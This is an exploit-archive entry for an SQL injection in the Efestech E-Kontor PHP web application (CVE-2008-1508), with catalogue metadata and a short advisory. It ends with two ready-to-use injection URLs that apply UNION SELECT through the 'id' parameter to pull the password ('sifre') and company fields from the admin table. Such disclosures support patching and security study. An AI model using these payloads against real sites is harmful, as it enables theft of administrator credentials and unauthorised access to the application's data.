Efestech E-Kontor - 'id' SQL Injection

Author: RMx
type: webapps
platform: php
port: 
date_added: 2008-03-24  
date_updated: 2014-02-07  
verified: 1  
codes: CVE-2008-1508;OSVDB-43659  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 31476.txt  
source: https://www.securityfocus.com/bid/28412/info

Efestech E-Kontor is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

http://www.example.com/?id=-1%20union+select+0,sifre,2,3+from+admin+where+id=1
http://www.example.com/?id=-1%20union+select+0,firma,2,3+from+admin+where+id=1